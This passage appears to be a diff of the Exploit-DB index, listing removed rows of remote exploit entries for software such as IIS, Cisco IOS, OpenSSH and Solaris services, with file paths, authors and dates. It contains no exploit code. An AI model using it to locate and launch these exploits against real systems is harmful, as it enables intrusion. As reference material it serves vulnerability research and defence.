-20895,exploits/cgi/remote/20895.txt,"WebTrends Enterprise Reporting Server 3.1 c/3.5 - Source Code Disclosure",2001-06-03,"Auriemma Luigi",cgi,remote, -20896,exploits/windows/remote/20896.txt,"OReilly Software WebBoard 4.10.30 - Pager Hostile JavaScript",2001-06-02,"Helmuth Antholzer",windows,remote, -20899,exploits/windows/remote/20899.txt,"Microsoft Outlook 97/98/2000/4/5 - Address Book Spoofing",2001-06-05,3APA3A,windows,remote, -20902,exploits/linux/remote/20902.c,"PKCrew TIAtunnel 0.9 alpha2 - Authentication Mechanism Buffer Overflow",2001-06-05,qitest1,linux,remote, -20903,exploits/windows/remote/20903.html,"Microsoft Internet Explorer 5.5 - File Disclosure",2001-03-31,"Georgi Guninski",windows,remote, -20908,exploits/linux/remote/20908.c,"Xinetd 2.1.8 - Remote Buffer Overflow",2001-06-28,qitest1,linux,remote, -20909,exploits/multiple/remote/20909.txt,"IBM Tivoli NetView 5/6 - OVActionD SNMPNotify Command Execution",2001-06-08,"Milo van der Zee",multiple,remote, -20910,exploits/windows/remote/20910.pl,"TransSoft Broker FTP Server 3.0/4.0/4.7/5.x - CWD Buffer Overflow",2001-06-10,byterage,windows,remote, -20911,exploits/osx/remote/20911.txt,"Apache 1.3.14 - Mac File Protection Bypass",2001-06-10,"Stefan Arentz",osx,remote, -20912,exploits/windows/remote/20912.txt,"Trend Micro Interscan VirusWall for Windows NT 3.51 - Configurations Modification",2001-06-12,"SNS Advisory",windows,remote, -20914,exploits/cgi/remote/20914.pl,"cgiCentral WebStore 400 - Administrator Authentication Bypass",2001-05-06,"Igor Dobrovitski",cgi,remote, -20916,exploits/cgi/remote/20916.pl,"cgiCentral WebStore 400 - Arbitrary Command Execution",2001-05-06,"Igor Dobrovitski",cgi,remote, -20924,exploits/linux/remote/20924.txt,"MDBms 0.96/0.99 - Query Display Buffer Overflow",2001-06-12,teleh0r,linux,remote, -20929,exploits/linux/remote/20929.c,"ghttpd 1.4 - Daemon Buffer Overflow",2001-06-17,qitest1,linux,remote, -20931,exploits/windows/remote/20931.c,"Microsoft Index Server 2.0 / Indexing Service (Windows 2000) - ISAPI Extension Buffer Overflow (2)",2001-06-21,hsj,windows,remote, -20932,exploits/windows/remote/20932.sh,"Microsoft Index Server 2.0 / Indexing Service (Windows 2000) - ISAPI Extension Buffer Overflow (3)",2001-06-18,mat,windows,remote, -20933,exploits/windows/remote/20933.pl,"Microsoft Index Server 2.0 / Indexing Service (Windows 2000) - ISAPI Extension Buffer Overflow (4)",2001-06-18,blackangels,windows,remote, -20934,exploits/windows/remote/20934.txt,"Internet Software Solutions Air Messenger LAN Server 3.4.2 - Full Path Disclosure",2001-06-18,"SNS Research",windows,remote, -20935,exploits/cgi/remote/20935.pl,"Microburst uDirectory 2.0 - Remote Command Execution",2001-06-18,"Igor Dobrovitski",cgi,remote, -20936,exploits/linux/remote/20936.c,"NetSQL 1.0 - Remote Buffer Overflow",2001-06-15,"Sergio Monteiro",linux,remote, -20938,exploits/cgi/remote/20938.txt,"DC Scripts DCShop Beta 1.0 02 - File Disclosure (1)",2001-06-18,"Peter Helms",cgi,remote, -20939,exploits/cgi/remote/20939.txt,"DC Scripts DCShop Beta 1.0 02 - File Disclosure (2)",2001-06-18,"Peter Helms",cgi,remote, -20940,exploits/cgi/remote/20940.txt,"Tarantella Enterprise 3 3.x - 'TTAWebTop.cgi' Arbitrary File Viewing",2001-06-18,kf,cgi,remote, -20941,exploits/freebsd/remote/20941.pl,"W3M 0.1/0.2 - Malformed MIME Header Buffer Overflow",2001-06-19,White_E,freebsd,remote, -20947,exploits/windows/remote/20947.txt,"1C: Arcadia Internet Store 1.0 - Arbitrary File Disclosure",2001-06-21,ViperSV,windows,remote, -20948,exploits/windows/remote/20948.txt,"1C: Arcadia Internet Store 1.0 - Path Disclosure",2001-06-21,ViperSV,windows,remote, -20950,exploits/windows/remote/20950.c,"Microsoft Visual Studio RAD Support - Remote Buffer Overflow",2001-06-21,"NSFOCUS Security Team",windows,remote, -20951,exploits/windows/remote/20951.pm,"Microsoft Visual Studio RAD Support - Remote Buffer Overflow (MS03-051) (Metasploit)",2001-06-21,"NSFOCUS Security Team",windows,remote, -20953,exploits/linux/remote/20953.c,"eXtremail 1.x/2.1 - Remote Format String (2)",2001-06-21,mu-b,linux,remote, -20954,exploits/linux/remote/20954.pl,"eXtremail 1.x/2.1 - Remote Format String (3)",2006-10-06,mu-b,linux,remote, -21017,exploits/linux/remote/21017.txt,"Squid Web Proxy 2.3 - Reverse Proxy",2001-07-18,"Paul Nasrat",linux,remote, -21018,exploits/unix/remote/21018.c,"Solaris 2.x/7.0/8 / IRIX 6.5.x / OpenBSD 2.x / NetBSD 1.x / Debian 3 / HP-UX 10 - 'TelnetD' Remote Buffer Overflow",2001-07-18,Dvorak,unix,remote, -20966,exploits/solaris/remote/20966.c,"Netscape PublishingXPert 2.0/2.2/2.5 - Local File Reading",2000-04-06,"\x00\x00",solaris,remote, -20968,exploits/unix/remote/20968.txt,"Samba 2.0.x/2.2 - Arbitrary File Creation",2001-06-23,"Michal Zalewski",unix,remote, -20972,exploits/multiple/remote/20972.txt,"Icecast 1.1.x/1.3.x - Directory Traversal",2001-06-26,gollum,multiple,remote, -20975,exploits/hardware/remote/20975.pl,"Cisco IOS 11.x/12.x - HTTP Configuration Arbitrary Administrative Access (1)",2001-06-27,cronos,hardware,remote, -20976,exploits/hardware/remote/20976.c,"Cisco IOS 11.x/12.x - HTTP Configuration Arbitrary Administrative Access (2)",2001-06-27,"Eliel C. Sardanons",hardware,remote, -20977,exploits/hardware/remote/20977.pl,"Cisco IOS 11.x/12.x - HTTP Configuration Arbitrary Administrative Access (3)",2001-03-07,hypoclear,hardware,remote, -20978,exploits/hardware/remote/20978.pl,"Cisco IOS 11.x/12.x - HTTP Configuration Arbitrary Administrative Access (4)",2001-06-27,blackangels,hardware,remote, -20980,exploits/windows/remote/20980.c,"Oracle 8i - TNS Listener Buffer Overflow",2001-07-20,benjurry,windows,remote, -20982,exploits/cgi/remote/20982.pl,"Active Classifieds 1.0 - Arbitrary Code Execution",2001-06-28,"Igor Dobrovitski",cgi,remote, -20984,exploits/osx/remote/20984.txt,"Apple Mac OSX 10 - nidump Password File Disclosure",2001-06-26,"Steven Kreuzer",osx,remote, -20993,exploits/unix/remote/20993.c,"XFree86 X11R6 3.3 XDM - Session Cookie Guessing",2001-06-24,"ntf & sky",unix,remote, -20994,exploits/linux/remote/20994.txt,"Cobalt Raq3 PopRelayD - Arbitrary SMTP Relay",2001-07-04,"Andrea Barisani",linux,remote, -20998,exploits/linux/remote/20998.c,"xloadimage 4.1 - Remote Buffer Overflow",2001-07-10,"zenith parsec",linux,remote, -21002,exploits/multiple/remote/21002.txt,"Apache 1.3 - Directory Index Disclosure",2001-07-10,Kevin,multiple,remote, -21003,exploits/windows/remote/21003.txt,"Microsoft Outlook 98/2000/2002 - Unauthorized Email Access",2001-07-12,"Georgi Guninski",windows,remote, -21004,exploits/windows/remote/21004.txt,"Microsoft Outlook 98/2000/2002 - Arbitrary Code Execution",2001-07-12,"Georgi Guninski",windows,remote, -21008,exploits/cgi/remote/21008.txt,"Interactive story 1.3 - Directory Traversal",2001-07-15,qDefense,cgi,remote, -21009,exploits/windows/remote/21009.c,"ArGoSoft FTP Server 1.2.2.2 - Weak Password Encryption",2001-07-12,byterage,windows,remote, -21011,exploits/hardware/remote/21011.pl,"3Com SuperStack II PS Hub 40 - TelnetD Weak Password Protection",2001-07-12,Siberian,hardware,remote, -21015,exploits/hardware/remote/21015.pl,"Check Point Firewall-1 4 Securemote - Network Information Leak",2001-07-17,"Haroon Meer & Roelof Temmingh",hardware,remote, -21019,exploits/linux/remote/21019.txt,"Horde 1.2.x/2.1.3 and Imp 2.2.x/3.1.2 - File Disclosure",2001-07-13,"Caldera Open Linux",linux,remote, -21021,exploits/unix/remote/21021.pl,"SSH2 3.0 - Short Password Login",2001-07-21,hypoclear,unix,remote, -21023,exploits/cgi/remote/21023.txt,"CGIWrap 2.x/3.x - Cross-Site Scripting",2001-07-22,"TAKAGI Hiromitsu",cgi,remote, -21025,exploits/multiple/remote/21025.txt,"Proxomitron Naoko-4 - Cross-Site Scripting",2001-07-24,"TAKAGI Hiromitsu",multiple,remote, -21026,exploits/multiple/remote/21026.txt,"Sambar Server 4.4/5.0 - 'pagecount' File Overwrite",2001-07-22,kyprizel,multiple,remote, -21027,exploits/multiple/remote/21027.txt,"Sambar Server 4.x/5.0 - Insecure Default Password Protection",2001-07-25,3APA3A,multiple,remote, -21029,exploits/multiple/remote/21029.pl,"Softek MailMarshal 4 / Trend Micro ScanMail 1.0 - SMTP Attachment Protection Bypass",2001-07-25,"Aidan O'Kelly",multiple,remote, -21030,exploits/windows/remote/21030.txt,"SnapStream Personal Video Station 1.2 a - PVS Directory Traversal",2001-07-26,john@interrorem.com,windows,remote, -21034,exploits/windows/remote/21034.rb,"SAP NetWeaver Dispatcher - DiagTraceR3Info Buffer Overflow (Metasploit)",2012-09-07,Metasploit,windows,remote,3200 -21035,exploits/windows/remote/21035.txt,"SnapStream PVS 1.2 - Plaintext Password",2001-07-26,John,windows,remote, -21036,exploits/windows/remote/21036.pl,"Ipswitch WS_FTP Server 2.0 - Anonymous Multiple FTP Command Buffer Overflows",2001-07-25,andreas,windows,remote, -21037,exploits/linux/remote/21037.c,"GNU groff 1.1x - xploitation Via LPD",2001-06-23,zen-parse,linux,remote, -21039,exploits/windows/remote/21039.pl,"SimpleServer:WWW 1.0.7/1.0.8/1.13 - Hex Encoded URL Directory Traversal",2001-07-26,THRAN,windows,remote, -21049,exploits/linux/remote/21049.c,"NCSA HTTPd 1.x - Remote Buffer Overflow (1)",1997-04-23,savage,linux,remote, -21050,exploits/linux/remote/21050.c,"NCSA HTTPd 1.x - Remote Buffer Overflow (2)",1995-02-17,Xtremist,linux,remote, -21057,exploits/windows/remote/21057.txt,"Microsoft IIS 4.0/5.0/6.0 - Internal IP Address/Internal Network Name Disclosure",2001-08-08,"Marek Roy",windows,remote, -21064,exploits/unix/remote/21064.c,"Fetchmail 5.x - POP3 Reply Signed Integer Index",2001-08-09,"Salvatore Sanfilippo -antirez-",unix,remote, -21066,exploits/unix/remote/21066.c,"Fetchmail 5.x - IMAP Reply Signed Integer Index",2001-08-09,"Sanfillipo antirez",unix,remote, -21067,exploits/multiple/remote/21067.c,"Apache 1.0/1.2/1.3 - Server Address Disclosure",2001-08-21,magnum,multiple,remote, -21068,exploits/cgi/remote/21068.txt,"SIX-webboard 2.01 - File Retrieval",2001-08-31,"Hannibal Lector",cgi,remote, -21075,exploits/linux/remote/21075.txt,"SuSE 6.3/6.4/7.0 sdb - Arbitrary Command Execution",2001-08-02,"Maurycy Prodeus",linux,remote, -21080,exploits/multiple/remote/21080.rb,"JBoss - DeploymentFileRepository WAR Deployment (via JMXInvokerServlet) (Metasploit)",2012-09-05,Metasploit,multiple,remote, -21088,exploits/unix/remote/21088.pl,"AOLServer 3 - 'Authentication String' Remote Buffer Overflow (1)",2001-08-22,"Nate Haggard",unix,remote, -21089,exploits/unix/remote/21089.c,"AOLServer 3 - 'Authentication String' Remote Buffer Overflow (2)",2001-09-05,qitest1,unix,remote, -21093,exploits/aix/remote/21093.c,"AIX 4.1/4.2 - 'pdnsd' Remote Buffer Overflow",1999-08-17,"Last Stage of Delirium",aix,remote, -21095,exploits/linux/remote/21095.txt,"RedHat 6.2/7.0/7.1 Lpd - Remote Command Execution via DVI Printfilter Configuration Error",2001-08-27,"zenith parsec",linux,remote, -21097,exploits/solaris/remote/21097.txt,"Solaris 2.x/7.0/8 LPD - Remote Command Execution",2001-08-31,ron1n,solaris,remote, -21100,exploits/multiple/remote/21100.pl,"Cisco Secure IDS 2.0/3.0 / Snort 1.x / ISS RealSecure 5/6 / NFR 5.0 - Encoded IIS Detection Evasion",2001-09-05,blackangels,multiple,remote, -21102,exploits/cgi/remote/21102.txt,"Power Up HTML 0.8033 Beta - Directory Traversal Arbitrary File Disclosure",2001-09-07,"Steve Shepherd",cgi,remote, -21104,exploits/cgi/remote/21104.pl,"Hassan Consulting Shopping Cart 1.23 - Arbitrary Command Execution",2001-09-08,"Alexey Sintsov",cgi,remote, -21109,exploits/windows/remote/21109.c,"EFTP 2.0.7 337 - Remote Buffer Overflow Code Execution / Denial of Service",2001-09-12,byterage,windows,remote, -21110,exploits/windows/remote/21110.pl,"EFTP Server 2.0.7.337 - Directory Existence / File Existence",2001-09-12,byterage,windows,remote, -21112,exploits/linux/remote/21112.php,"RedHat Linux 7.0 Apache - Remote Username Enumeration",2001-09-12,"Gabriel A Maggiotti",linux,remote, -21113,exploits/windows/remote/21113.txt,"Microsoft Index Server 2.0 - File Information / Full Path Disclosure",2001-09-14,"Syed Mohamed",windows,remote, -21115,exploits/multiple/remote/21115.pl,"AmTote Homebet - World Accessible Log",2001-09-28,"Gary O'Leary-Steele",multiple,remote, -21116,exploits/multiple/remote/21116.pl,"Amtote Homebet - Account Information Brute Force",2001-09-28,"Gary O'Leary-Steele",multiple,remote, -21118,exploits/windows/remote/21118.txt,"Microsoft Internet Explorer 5 - Zone Spoofing (MS01-055)",2001-10-10,"kikkert security",windows,remote, -21121,exploits/windows/remote/21121.pl,"Oracle9iAS Web Cache 2.0 - Remote Buffer Overflow",2001-10-18,andreas,windows,remote, -21125,exploits/cgi/remote/21125.pl,"Mountain Network Systems WebCart 8.4 - Command Execution",2001-10-19,root@xpteam.f2s.com,cgi,remote, -21127,exploits/windows/remote/21127.txt,"Microsoft Internet Explorer 5/6 - JavaScript Interface Spoofing",2001-10-21,"Georgi Guninski",windows,remote, -21128,exploits/unix/remote/21128.c,"NSI Rwhoisd 1.5 - Remote Format String",2001-04-17,CowPower,unix,remote, -21129,exploits/cgi/remote/21129.java,"iBill Management Script - Weak Hard-Coded Password",2001-10-25,"MK Ultra",cgi,remote, -21136,exploits/linux/remote/21136.rb,"Symantec Messaging Gateway 9.5/9.5.1 - SSH Default Password Security Bypass (Metasploit)",2012-08-30,Metasploit,linux,remote, -21137,exploits/multiple/remote/21137.rb,"HP SiteScope (Linux/Windows) - Remote Code Execution (Metasploit)",2012-09-08,Metasploit,multiple,remote, -21138,exploits/php/remote/21138.rb,"Sflog! CMS 1.0 - Arbitrary File Upload (Metasploit)",2012-09-08,Metasploit,php,remote, -21142,exploits/windows/remote/21142.pl,"Ipswitch WS_FTP Server 1.0.x/2.0.x - 'STAT' Remote Buffer Overflow",2001-11-05,andreas,windows,remote, -21144,exploits/windows/remote/21144.txt,"Microsoft Internet Explorer 5/6 - Cookie Disclosure/Modification",2001-11-09,"Jouko Pynnonen",windows,remote, -21145,exploits/multiple/remote/21145.nasl,"IBM HTTP Server 1.3.x - Source Code Disclosure",2001-11-08,"Felix Huber",multiple,remote, -21151,exploits/linux/remote/21151.txt,"Horde IMP 2.2.x - Session Hijacking",2001-11-09,"Joao Pedro Goncalves",linux,remote, -21152,exploits/linux/remote/21152.c,"ActivePerl 5.6.1 - 'perlIIS.dll' Remote Buffer Overflow (1)",2001-11-15,Indigo,linux,remote, -21153,exploits/windows/remote/21153.c,"ActivePerl 5.6.1 - 'perlIIS.dll' Remote Buffer Overflow (2)",2001-11-15,Indigo,windows,remote, -21154,exploits/multiple/remote/21154.pl,"ActivePerl 5.6.1 - 'perlIIS.dll' Remote Buffer Overflow (3)",2001-11-15,Sapient2003,multiple,remote, -21155,exploits/php/remote/21155.txt,"PHP-Nuke Network Tool 0.2 Addon - MetaCharacter Filtering Command Execution",2001-11-16,"Cabezon Aurélien",php,remote, -21156,exploits/windows/remote/21156.txt,"Opera 5.0/5.1 - Same Origin Policy Circumvention",2001-11-15,"Georgi Guninski",windows,remote, -21160,exploits/multiple/remote/21160.txt,"ibm informix Web Datablade 3.x/4.1 - Directory Traversal",2001-11-22,"Beck Mr.R",multiple,remote, -21161,exploits/unix/remote/21161.txt,"WU-FTPD 2.6 - File Globbing Heap Corruption",2001-11-27,"Core Security Technologies",unix,remote, -21164,exploits/windows/remote/21164.txt,"Microsoft Internet Explorer 5.5/6.0 - Spoofable File Extensions",2001-11-26,StatiC,windows,remote, -21169,exploits/windows/remote/21169.txt,"ZoneAlarm Pro 1.0/2.x - Outbound Packet Bypass",2001-12-06,"Tom Liston",windows,remote, -21178,exploits/windows/remote/21178.html,"Brian Dorricott MAILTO 1.0.7-9 - Unauthorized Mail Server Use",2001-12-11,http-equiv,windows,remote, -21179,exploits/solaris/remote/21179.pl,"Solaris 2.x/7.0/8 - Derived 'login' Remote Buffer Overflow",2003-01-09,snooq,solaris,remote, -21182,exploits/novell/remote/21182.txt,"Novell Groupwise 5.5/6.0 Servlet Gateway - Default Authentication",2001-12-15,"Adam Gray",novell,remote, -21183,exploits/cgi/remote/21183.txt,"webmin 0.91 - Directory Traversal",2001-12-17,"A. Ramos",cgi,remote, -21185,exploits/unix/remote/21185.sh,"QPopper 4.0.x - PopAuth Trace File Shell Command Execution",2001-12-18,IhaQueR,unix,remote, -21186,exploits/hardware/remote/21186.txt,"ZYXEL Prestige 681 SDSL Router - IP Fragment Reassembly",2001-12-18,"Przemyslaw Frasunek",hardware,remote, -21188,exploits/windows/remote/21188.c,"Microsoft Windows 98/XP/ME - UPnP NOTIFY Buffer Overflow (1)",2001-12-20,"Gabriel Maggiotti",windows,remote, -21189,exploits/windows/remote/21189.c,"Microsoft Windows 98/XP/ME - UPnP NOTIFY Buffer Overflow (2)",2001-12-20,JOCANOR,windows,remote, -21190,exploits/linux/remote/21190.rb,"WAN Emulator 2.3 - Command Execution (Metasploit)",2012-09-10,Metasploit,linux,remote, -21191,exploits/linux/remote/21191.rb,"OpenFiler 2.x - NetworkCard Command Execution (Metasploit)",2012-09-10,Metasploit,linux,remote, -21192,exploits/linux/remote/21192.c,"STunnel 3.x - Client Negotiation Protocol Format String",2001-12-22,deltha,linux,remote, -21193,exploits/multiple/remote/21193.txt,"DeleGate 7.7.1 - Cross-Site Scripting",2001-12-28,"SNS Research",multiple,remote, -21194,exploits/cgi/remote/21194.txt,"Abe Timmerman - 'zml.cgi' File Disclosure",2001-12-31,blackshell,cgi,remote, -21195,exploits/windows/remote/21195.txt,"Microsoft Internet Explorer 5/6 - GetObject File Disclosure",2002-01-01,"Georgi Guninski",windows,remote, -21196,exploits/windows/remote/21196.txt,"AOL Instant Messenger 4.x - Remote Buffer Overflow",2002-01-02,"Matt Conover",windows,remote, -21197,exploits/multiple/remote/21197.txt,"BSCW 3.4/4.0 - Insecure Default Installation",2002-01-03,"Thomas Seliger",multiple,remote, -21198,exploits/windows/remote/21198.html,"Microsoft Internet Explorer 5 - JavaScript Local File Enumeration (1)",2002-01-03,"Tom Micklovitch",windows,remote, -21199,exploits/windows/remote/21199.txt,"Microsoft Internet Explorer 5 - JavaScript Local File Enumeration (2)",2002-01-03,"Liu Die",windows,remote, -21200,exploits/linux/remote/21200.c,"Net-SNMP 4.2.3 - snmpnetstat Remote Heap Overflow",2002-01-03,"Juan M. de la Torre",linux,remote, -21201,exploits/windows/remote/21201.pl,"BrowseFTP Client 1.62 - Remote Buffer Overflow",2002-01-04,Kanatoko,windows,remote, -21203,exploits/windows/remote/21203.txt,"Lucent 8.x - VitalNet Password Authentication Bypass",2002-01-16,"Mark Cooper",windows,remote, -21204,exploits/windows/remote/21204.txt,"Apache 1.3.20 (Win32) - 'PHP.exe' Remote File Disclosure",2002-01-04,"Paul Brereton",windows,remote, -21205,exploits/linux/remote/21205.c,"Boozt 0.9.8 - Remote Buffer Overflow",2002-01-07,"Rafael San Miguel Carrasco",linux,remote, -21207,exploits/windows/remote/21207.c,"RealPlayer 7.0/8.0 - Media File Buffer Overflow",2002-01-05,UNYUN,windows,remote, -21210,exploits/linux/remote/21210.txt,"X-Chat 1.x - CTCP Ping Remote IRC Command Execution",2002-01-09,"Marcus Meissner",linux,remote, -21211,exploits/windows/remote/21211.txt,"EServ 2.9x - Password-Protected File Access",2002-01-10,"Tamer Sahin",windows,remote, -21212,exploits/multiple/remote/21212.txt,"Cacheflow CacheOS 3.1/4.0 Web Administration - Arbitrary Cached Page Code Leakage",2002-01-08,"Bjorn Djupvik",multiple,remote, -21214,exploits/windows/remote/21214.c,"SapporoWorks Black JumboDog 2.6.4/2.6.5 - HTTP Proxy Buffer Overflow",2002-01-01,UNYUN,windows,remote, -21215,exploits/unix/remote/21215.c,"FreeWnn 1.1 0 - jserver JS_MKDIR MetaCharacter Command Execution",2002-01-11,UNYUN,unix,remote, -21225,exploits/windows/remote/21225.c,"John Roy Pi3Web 2.0 For Windows - Remote Buffer Overflow",2002-01-14,aT4r,windows,remote, -21235,exploits/windows/remote/21235.pl,"Citrix Nfuse 1.6 - Published Applications Information Leak",2002-01-22,"Ian Vitek",windows,remote, -21238,exploits/osx/remote/21238.txt,"Apple Mac OS Internet Explorer 3/4/5 - File Execution",2002-01-22,"Jass Seljamaa",osx,remote, -21242,exploits/linux/remote/21242.c,"rsync 2.3/2.4/2.5 - Signed Array Index Remote Code Execution",2002-01-25,sorbo,linux,remote, -21243,exploits/hardware/remote/21243.pl,"Alteon AceDirector - Half-Closed HTTP Request IP Address Revealing",2001-12-20,"Dave Plonka",hardware,remote, -21249,exploits/cgi/remote/21249.txt,"Agora.CGI 3/4 - Debug Mode Full Path Disclosure",2002-01-28,superpetz,cgi,remote, -21260,exploits/windows/remote/21260.txt,"Microsoft Site Server 3.0 - Cross-Site Scripting",2002-01-29,"rain forest puppy",windows,remote, -21263,exploits/cgi/remote/21263.txt,"Faq-O-Matic 2.6/2.7 - Cross-Site Scripting",2002-02-04,superpetz,cgi,remote, -21264,exploits/php/remote/21264.php,"PHP 4.x/5.x MySQL Library - 'Safe_mode' Filesystem Circumvention (1)",2002-02-03,"Dave Wilson",php,remote, -21265,exploits/php/remote/21265.php,"PHP 4.x/5.x MySQL Library - 'Safe_mode' Filesystem Circumvention (2)",2002-02-03,anonymous,php,remote, -21266,exploits/php/remote/21266.php,"PHP 4.x/5.x MySQL Library - 'Safe_mode' Filesystem Circumvention (3)",2002-02-03,anonymous,php,remote, -21268,exploits/hardware/remote/21268.py,"Sitecom MD-25x - Multiple Vulnerabilities",2012-09-12,"Mattijs van Ommeren",hardware,remote, -21274,exploits/windows/remote/21274.c,"MIRC 2.x/3.x/4.x/5.x - Nick Buffer Overflow",2002-02-03,"James Martin",windows,remote, -21276,exploits/multiple/remote/21276.txt,"Thunderstone TEXIS 3.0 - Full Path Disclosure",2002-02-06,phinegeek,multiple,remote, -21285,exploits/hardware/remote/21285.txt,"HP AdvanceStack Switch - Authentication Bypass",2002-02-08,"Tamer Sahin",hardware,remote, -21286,exploits/windows/remote/21286.c,"Apple QuickTime 5.0 - Content-Type Remote Buffer Overflow",2002-02-08,UNYUN,windows,remote, -21287,exploits/cgi/remote/21287.pl,"EZNE.NET Ezboard 2000 - Remote Buffer Overflow",2002-02-11,"Jin Ho You",cgi,remote, -21289,exploits/linux/remote/21289.c,"Ettercap 0.6.3.1 - Large Packet Buffer Overflow",2002-02-14,"Fermín J. Serna",linux,remote, -21291,exploits/windows/remote/21291.pl,"Phusion WebServer 1.0 - Directory Traversal (1)",2002-02-16,"Alex Hernandez",windows,remote, -21292,exploits/windows/remote/21292.pl,"Phusion WebServer 1.0 - Directory Traversal (2)",2002-02-16,"Alex Hernandez",windows,remote, -21294,exploits/windows/remote/21294.c,"Phusion WebServer 1.0 - 'URL' Remote Buffer Overflow",2002-02-16,"Alex Hernandez",windows,remote, -21295,exploits/multiple/remote/21295.txt,"GNUJSP 1.0 - File Disclosure",2002-02-19,"Thomas Springer",multiple,remote, -21297,exploits/unix/remote/21297.c,"Squid 2.0-4 - Cache FTP Proxy URL Buffer Overflow",2002-02-21,gunzip,unix,remote, -21298,exploits/windows/remote/21298.c,"Essentia Web Server 2.1 - 'URL' Remote Buffer Overflow",2003-07-04,B-r00t,windows,remote, -21303,exploits/windows/remote/21303.txt,"Working Resources BadBlue 1.5/1.6 - Directory Traversal",2002-02-26,"Strumpf Noir Society",windows,remote, -21309,exploits/linux/remote/21309.c,"xtell 1.91.1/2.6.1 - Multiple Remote Buffer Overflow Vulnerabilities",2002-02-27,spybreak,linux,remote, -21310,exploits/linux/remote/21310.txt,"xtell 2.6.1 - User Status Remote Information Disclosure",2002-02-27,spybreak,linux,remote, -21311,exploits/windows/remote/21311.txt,"BPM Studio Pro 4.2 - HTTPd Directory Traversal",2002-02-27,UNTER,windows,remote, -21313,exploits/windows/remote/21313.txt,"Microsoft IIS 4.0/5.0/5.1 - Authentication Method Disclosure",2002-03-05,"David Litchfield",windows,remote, -21314,exploits/unix/remote/21314.txt,"OpenSSH 2.x/3.0.1/3.0.2 - Channel Code Off-by-One",2002-03-07,Morgan,unix,remote, -21334,exploits/php/remote/21334.pl,"Cobalt RaQ 2.0/3.0/4.0 XTR - 'MultiFileUpload.php' Authentication Bypass (1)",2002-03-08,"Wouter ter Maat",php,remote, -21335,exploits/php/remote/21335.sh,"Cobalt RaQ 2.0/3.0/4.0 XTR - 'MultiFileUpload.php' Authentication Bypass (2)",2002-03-08,"Wouter ter Maat",php,remote, -21339,exploits/multiple/remote/21339.c,"Trend Micro Interscan VirusWall 3.5/3.6 - Content-Length Scan Bypass",2002-03-11,"Jochen Thomas Bauer",multiple,remote, -21340,exploits/cgi/remote/21340.pl,"Solaris 7.0/8 Sunsolve CD - SSCD_SunCourier.pl CGI Script Arbitrary Command Execution",2002-03-11,Fyodor,cgi,remote, -21350,exploits/windows/remote/21350.pl,"Apache Win32 1.3.x/2.0.x - Batch File Remote Command Execution",2002-03-21,SPAX,windows,remote, -21354,exploits/cgi/remote/21354.txt,"CSSearch 2.3 - Remote Command Execution",2002-03-26,"Steve Gustin",cgi,remote, -21355,exploits/jsp/remote/21355.txt,"Citrix NFuse 1.51/1.6 - Cross-Site Scripting",2002-03-27,"Eric Detoisien",jsp,remote, -21361,exploits/windows/remote/21361.txt,"Microsoft Internet Explorer 5 - Cascading Style Sheet File Disclosure (MS02-023)",2002-04-02,"GreyMagic Software",windows,remote, -21363,exploits/unix/remote/21363.c,"Icecast 1.x - AVLLib Buffer Overflow",2002-02-16,dizznutt,unix,remote, -21364,exploits/netbsd_x86/remote/21364.txt,"NetBSD 1.x - 'TalkD' User Validation",2002-04-03,"Tekno pHReak",netbsd_x86,remote, -21365,exploits/linux/remote/21365.txt,"phpGroupWare 0.9.13 - Debian Package Configuration",2002-04-03,"Matthias Jordan",linux,remote, -21367,exploits/windows/remote/21367.txt,"Abyss Web Server 1.0 - File Disclosure",2002-04-07,"Jeremy Roberts",windows,remote, -21368,exploits/windows/remote/21368.c,"Microsoft IIS 4.0/5.0 - Chunked Encoding Transfer Heap Overflow (1)",2002-04-10,"CHINANSL Security Team",windows,remote, -21369,exploits/windows/remote/21369.c,"Microsoft IIS 4.0/5.0 - Chunked Encoding Transfer Heap Overflow (2)",2002-04-14,hsj,windows,remote, -21370,exploits/windows/remote/21370.c,"Microsoft IIS 4.0/5.0 - Chunked Encoding Transfer Heap Overflow (3)",2002-04-10,NeMeS||y,windows,remote, -21371,exploits/windows/remote/21371.c,"Microsoft IIS 4.0/5.0 - Chunked Encoding Transfer Heap Overflow (4)",2002-04-24,yuange,windows,remote, -21372,exploits/windows/remote/21372.txt,"Microsoft IIS 4.0/5.0 - HTTP Error Page Cross-Site Scripting",2002-04-10,"Thor Larholm",windows,remote, -21376,exploits/windows/remote/21376.html,"Microsoft Internet Explorer 5.5/6.0 - History List Script Injection",2002-04-15,"Andreas Sandblad",windows,remote, -21378,exploits/hardware/remote/21378.txt,"Nortel CVX 1800 Multi-Service Access Switch - Default SNMP Community",2002-04-15,"Michael Rawls",hardware,remote, -21384,exploits/multiple/remote/21384.txt,"Demarc PureSecure 1.0.5 - Authentication Check SQL Injection",2002-04-15,"pokleyzz sakamaniaka",multiple,remote, -21385,exploits/windows/remote/21385.txt,"Microsoft IIS 5.0 - 'CodeBrws.asp' Source Code Disclosure",2002-04-16,"H D Moore",windows,remote, -21386,exploits/windows/remote/21386.html,"AOL Instant Messenger 4.x - Arbitrary File Creation",2002-04-17,"Noah Johnson",windows,remote, -21390,exploits/cgi/remote/21390.txt,"Sambar Server 5.1 - Script Source Disclosure",2002-04-17,pgrundl,cgi,remote, -21402,exploits/linux/remote/21402.txt,"OpenSSH 2.x/3.x - Kerberos 4 TGT/AFS Token Buffer Overflow",2002-04-19,"Marcell Fodor",linux,remote, -21410,exploits/windows/remote/21410.pl,"Matu FTP 1.74 - Client Buffer Overflow",2002-04-23,Kanatoko,windows,remote, -21412,exploits/unix/remote/21412.txt,"Apache Tomcat 4.0/4.1 - Servlet Full Path Disclosure",2002-04-23,"CHINANSL Security Team",unix,remote, -21415,exploits/cgi/remote/21415.txt,"CGIScript.net - csMailto Hidden Form Field Remote Command Execution",2002-04-23,"Steve Gustin",cgi,remote, -21422,exploits/linux/remote/21422.txt,"ACME Labs thttpd 2.20 - Cross-Site Scripting",2002-04-25,frog,linux,remote, -21437,exploits/solaris/remote/21437.c,"Solaris 2/7/8/9 cachefsd - Remote Heap Overflow",2002-01-01,"Last Stage of Delirium",solaris,remote, -21438,exploits/windows/remote/21438.txt,"WorldClient 5.0.x - Arbitrary File Deletion",2002-05-07,Obscure,windows,remote, -21439,exploits/windows/remote/21439.txt,"MDaemon WorldClient 5.0.x - Folder Creation Buffer Overflow",2002-05-07,Obscure,windows,remote, -21440,exploits/bsd/remote/21440.c,"ISC DHCPD 2.0/3.0.1 - NSUPDATE Remote Format String",2002-05-08,Andi,bsd,remote, -21441,exploits/hardware/remote/21441.txt,"Cisco ATA-186 - HTTP Device Configuration Disclosure",2002-05-09,"Patrick Michael 